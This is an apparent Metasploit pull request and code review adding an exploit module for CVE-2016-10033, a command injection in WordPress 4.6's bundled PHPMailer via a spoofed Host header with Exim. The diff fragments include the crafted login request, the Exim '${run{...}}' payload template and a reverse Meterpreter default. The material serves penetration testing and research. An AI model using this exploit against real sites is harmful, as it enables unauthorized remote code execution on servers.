### PR TITLE
Add WordPress 4.6 PHPMailer exploit

### PR DESCRIPTION
**Pull request by wvu**
**Note: this is a WordPress core vulnerability, since PHPMailer is bundled software. The only thing you probably need to install is Exim.**

```
msf exploit(wp_phpmailer_host_header) > info

       Name: WordPress PHPMailer Host Header Command Injection
     Module: exploit/unix/webapp/wp_phpmailer_host_header
   Platform: Linux
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Average
  Disclosed: 2017-05-03

Provided by:
  Dawid Golunski
  wvu <wvu@metasploit.com>

Available targets:
  Id  Name
  --  ----
  0   WordPress 4.6 / Exim

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOST                       yes       The target address
  RPORT      80               yes       The target port (TCP)
  SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
  SRVPORT    8080             yes       The local port to listen on.
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
  TARGETURI  /                yes       The base path to the wordpress application
  USERNAME   admin            yes       WordPress username

Payload information:

Description:
  This module exploits a command injection vulnerability in WordPress 
  version 4.6 with Exim as an MTA via a spoofed Host header to 
  PHPMailer, a mail-sending library that is bundled with WordPress. A 
  valid WordPress username is required to exploit the vulnerability. 
  Additionally, due to the altered Host header, exploitation is 
  limited to the default virtual host, assuming the header isn't 
  mangled in transit. If the target is running Apache 2.2.32 or 2.4.24 
  and later, the server may have HttpProtocolOptions set to Strict, 
  preventing a Host header containing parens from passing through, 
  making exploitation unlikely.

References:
  https://cvedetails.com/cve/CVE-2016-10033/
  https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html
  http://www.exim.org/exim-html-current/doc/html/spec_html/ch-string_expansions.html
  https://httpd.apache.org/docs/2.4/mod/core.html#httpprotocoloptions

msf exploit(wp_phpmailer_host_header) > 
```

### CODE REVIEW

File: modules/exploits/unix/webapp/wp_phpmailer_host_header.rb [hunk 1]
```diff
@@ -0,0 +1,90 @@
...
+        'wvu'             # Metasploit module
+      ],
+      'References'     => [
+        ['CVE', '2016-10033'],
+        ['URL', 'https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html']
+      ],
+      'DisclosureDate' => 'May 3 2017',
+      'License'        => MSF_LICENSE,
+      'Platform'       => 'unix',
+      'Arch'           => ARCH_CMD,
```
Comment (wvu-r7) [inline modules/exploits/unix/webapp/wp_phpmailer_host_header.rb]: Current revision uses `CmdStager`.

File: modules/exploits/unix/webapp/wp_phpmailer_host_header.rb [hunk 2]
```diff
@@ -0,0 +1,90 @@
...
+    else
+      Exploit::CheckCode::Detected
+    end
+  end
+
+  def exploit
+    send_request_cgi(
+      'method'        => 'POST',
+      'uri'           => wordpress_url_login,
+      'vhost'         => generate_exim_payload(payload.encoded),
```
Comment (wvu-r7) [inline modules/exploits/unix/webapp/wp_phpmailer_host_header.rb]: This won't work if `RPORT` is not 80 or 443.

File: modules/exploits/unix/webapp/wp_phpmailer_host_header.rb [hunk 3]
```diff
@@ -0,0 +1,90 @@
...
+      'vars_post'     => {
+        'user_login'  => datastore['USERNAME'],
+        'redirect_to' => '',
+        'wp-submit'   => 'Get New Password'
+      }
+    )
+  end
+
+  def generate_exim_payload(p)
+    "xenial(tmp1 -be ${run{#{encode_exim_payload(p)}}} tmp2)"
```
Comment (wvu-r7) [inline modules/exploits/unix/webapp/wp_phpmailer_host_header.rb]: These strings will be randomized.

**Comment by egypt** [comment]
I'm getting 400 errors with any `Host:` header containing parens on Debian 7, Apache 2.2, PHP 5.4.45, Wordpress 4.6

File: documentation/modules/exploit/unix/webapp/wp_phpmailer_host_header.md [hunk 4]
```diff
@@ -0,0 +1,62 @@
...
+
+This vuln has some caveats: you need approximately WordPress 4.6 with
+Exim for the `sendmail(8)` command.
+
+Thanks to WP's awesome practice of backporting the heck out of all their
+patches, we need to use a Git clone and check out the vuln release.
+
+## Setup
+
+This was tested on Ubuntu. YMMV.
```
Comment (h00die) [inline documentation/modules/exploit/unix/webapp/wp_phpmailer_host_header.md]: 16.10, 16.04?  most likely no diff, but good to add

Comment (wvu-r7) [inline documentation/modules/exploit/unix/webapp/wp_phpmailer_host_header.md]: Didn't think it'd be diff, but @egypt can't repro on Debian with older Apache. I'll add the version.

Comment (wvu-r7) [inline documentation/modules/exploit/unix/webapp/wp_phpmailer_host_header.md]: FWIW, the note about Ubuntu was for the install process, not the vulnerability. The install process shouldn't change with version.

File: modules/exploits/unix/webapp/wp_phpmailer_host_header.rb [hunk 5]
```diff
@@ -0,0 +1,176 @@
...
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'                => 'WordPress PHPMailer Host Header Command Injection',
+      'Description'         => %q{
+        This module exploits a command injection vulnerability in WordPress
+        version 4.6 with Exim as an MTA via a spoofed Host header to PHPMailer.
+
+        A valid WordPress username is required to exploit the vulnerability.
+        Additionally, due to the altered Host header, exploitation is limited to
+        the default virtual host, assuming the header isn't mangled in transit.
```
Comment (egypt) [inline modules/exploits/unix/webapp/wp_phpmailer_host_header.rb]: Should this deregister `VHOST`?

File: modules/exploits/unix/webapp/wp_phpmailer_host_header.rb [hunk 6]
```diff
@@ -0,0 +1,176 @@
...
+      'Platform'            => 'linux',
+      'Arch'                => [ARCH_X86, ARCH_X64],
+      'Privileged'          => false,
+      'Targets'             => [
+        ['WordPress 4.6 / Exim', {}]
+      ],
+      'DefaultTarget'       => 0,
+      'DefaultOptions'      => {
+        'PAYLOAD'           => 'linux/x64/meterpreter_reverse_https',
+        'LHOST'             => Rex::Socket.source_address,
```
Comment (egypt) [inline modules/exploits/unix/webapp/wp_phpmailer_host_header.rb]: It feels kinda rude to set LHOST here. Is there a particular reason for this?

Comment (wvu-r7) [inline modules/exploits/unix/webapp/wp_phpmailer_host_header.rb]: I set it so I could get some sane defaults for a better OOBE, but I kinda think too much magic can be a bad thing.

File: modules/exploits/unix/webapp/wp_phpmailer_host_header.rb (hunk 5 above)
Comment (wvu-r7) [inline modules/exploits/unix/webapp/wp_phpmailer_host_header.rb]: It doesn't have to, but yeah, I think that's better UX. I'll deregister it. :)

Comment (wvu-r7) [inline modules/exploits/unix/webapp/wp_phpmailer_host_header.rb]: Done!

Comment (wvu-r7) [inline modules/exploits/unix/webapp/wp_phpmailer_host_header.rb]: Updated the PR description. Kinda surprised I didn't notice it! I guess I should have read what I pasted. :D

Comment (wvu-r7) [inline modules/exploits/unix/webapp/wp_phpmailer_host_header.rb]: On that note, `URIPATH` needs to be deregistered, too.

File: modules/exploits/unix/webapp/wp_phpmailer_host_header.rb (hunk 6 above)
Comment (wvu-r7) [inline modules/exploits/unix/webapp/wp_phpmailer_host_header.rb]: And I was kinda tired of people asking what to set `LHOST` to. At least this gets us halfway there (makes less sense with NAT, forwards, multihoming, etc.).

I can remove this if you think it's rude. I'm more worried it'll start a bad habit for new users. Forcing them to set `LHOST` forces them to think about it.

Comment (wvu-r7) [inline modules/exploits/unix/webapp/wp_phpmailer_host_header.rb]: I've removed it because I don't fight for the users.

Comment (wvu-r7) [inline modules/exploits/unix/webapp/wp_phpmailer_host_header.rb]: That's a *Tron: Legacy* reference in case people start to think I hate users.

**Comment by wvu-r7** [comment]
https://github.com/rapid7/metasploit-framework/commit/1f4ff30adb09c836dc9cb5f2c2024a244cebd08d

**Comment by void-in** [comment]
# Release Notes
The modules/exploits/unix/webapp/wp_phpmailer_host_header.rb module exploits CVE 2016-10033 command injection vulnerability in the PHPMailer library used in WordPress version 4.6. The vulnerability is dependent on the Exim Mail Transfer Agent which is the default on Debian and Ubuntu.

**Pull request merged**